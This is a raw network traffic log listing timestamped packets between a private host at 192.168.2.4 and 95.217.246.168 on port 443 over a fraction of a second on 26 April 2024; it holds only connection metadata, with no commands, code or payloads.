Apr 26, 2024 11:03:02.829298019 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.835148096 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.835167885 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.835220098 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.835233927 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.835261106 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.835280895 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.841854095 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.841875076 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.841934919 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.841949940 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.842000008 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.847423077 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.847444057 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.847496033 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.847516060 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.847537994 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.847558022 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.853534937 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.853555918 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.853610992 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.853631020 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.853653908 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.853677034 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.859519005 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.859538078 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.859611034 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.859626055 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.859674931 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.864703894 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.864729881 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.864774942 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.864809036 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.864836931 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.864857912 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.869992971 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.870014906 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.870069027 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.870089054 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.870110989 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.870131016 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.875942945 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.875962973 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.876022100 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.876036882 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.876089096 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.882671118 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.882699966 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.882761955 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.882776022 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.882801056 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.882844925 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.887913942 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.887933969 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.888009071 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.888025045 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.888076067 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.893325090 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.893345118 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.893410921 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.893426895 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.893471956 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.893471956 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.898062944 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.898082018 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.898169041 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.898185968 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.898236990 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.903325081 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.903343916 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.903394938 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.903412104 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.903440952 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.903466940 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.908118963 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.908138037 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.908339977 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.908354998 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.908406973 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.913235903 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.913255930 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.913315058 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.913331032 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.913356066 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.913392067 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.917865992 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.917886019 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.917958021 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.917973042 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.918024063 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.922777891 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.922796965 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.922858000 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.922875881 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.922904015 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.922924995 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.928081036 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.928109884 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.928152084 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.928167105 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.928193092 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.928231001 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.932214022 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.932234049 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.932286978 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.932301044 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.932327032 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.932348013 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.936901093 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.936935902 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.936979055 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.936995029 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.937024117 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.937050104 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.941200972 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.941231966 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.941282034 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.941303015 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.941327095 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.941345930 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.946106911 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.946126938 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.946194887 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.946213007 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.946261883 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.950282097 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.950301886 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.950371027 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.950371981 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.950387955 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.950431108 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.954935074 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.954956055 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.955019951 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.955034971 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.955084085 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.959409952 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.959429979 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.959475994 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.959495068 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.959517956 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.959537029 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.963463068 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.963481903 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.963545084 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.963560104 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.963623047 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.967489004 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.967508078 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.967569113 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.967582941 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.967631102 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.971422911 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.971442938 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.971493006 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.971508026 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.971534014 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.971554041 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.975580931 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.975601912 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.975681067 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.975702047 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.975723982 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.975749969 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.979460955 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.979480982 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.979532003 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.979554892 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.979578018 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.979614019 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.984033108 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.984066010 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.984117985 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.984137058 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.984159946 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.984196901 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.990602016 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.990622044 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.990706921 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.990719080 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.990746021 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.990768909 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.994205952 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.994225025 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.994276047 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.994304895 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.994330883 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.994348049 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.997809887 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.997829914 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.997899055 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:02.997927904 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:02.997982025 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.002084017 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.002110004 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.002160072 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.002173901 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.002197981 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.002218008 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.005633116 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.005666018 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.005709887 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.005723000 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.005748034 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.005773067 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.009310961 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.009331942 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.009392023 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.009406090 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.009432077 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.009457111 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.013319016 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.013341904 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.013396978 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.013410091 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.013437033 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.013470888 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.016880989 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.016901016 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.016963959 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.016978979 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.017029047 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.020199060 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.020217896 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.020265102 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.020297050 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.020320892 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.020343065 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.023703098 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.023721933 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.023785114 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.023799896 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.023848057 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.027515888 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.027535915 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.027591944 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.027606010 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.027631998 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.027657032 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.031004906 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.031024933 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.031088114 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.031101942 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.031163931 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.034282923 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.034303904 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.034364939 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.034378052 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.034425020 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.038125038 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.038145065 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.038194895 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.038225889 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.038250923 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.038271904 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.041333914 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.041354895 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.041415930 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.041429043 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.041461945 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.041486025 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.044529915 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.044548988 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.044606924 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.044620991 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.044646025 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.044668913 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.047729969 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.047749996 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.047821999 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.047836065 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.047878981 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.051426888 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.051446915 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.051492929 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.051505089 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.051528931 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.051548958 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.054744005 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.054773092 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.054821014 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.054833889 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.054862022 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.054881096 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.057737112 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.057763100 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.057817936 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.057842970 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.057868004 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.057888985 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.061378956 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.061398983 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.061450005 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.061463118 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.061491013 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.061511993 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.064450979 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.064471006 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.064533949 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.064547062 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.064572096 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.064591885 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.067502022 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.067522049 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.067574978 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.067588091 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.067616940 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.067636967 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.070456982 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.070477009 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.070538044 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.070555925 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.070578098 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.070597887 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.073663950 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.073685884 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.073736906 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.073750019 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.073776007 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.073795080 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.076750994 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.076814890 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.076834917 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.076848030 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.076879978 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.076900959 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.080319881 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.080382109 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.080394030 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.080409050 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:03.080440044 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.080456972 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:03.083209991 CEST	443	49736	95.217.246.168	192.168.2.4
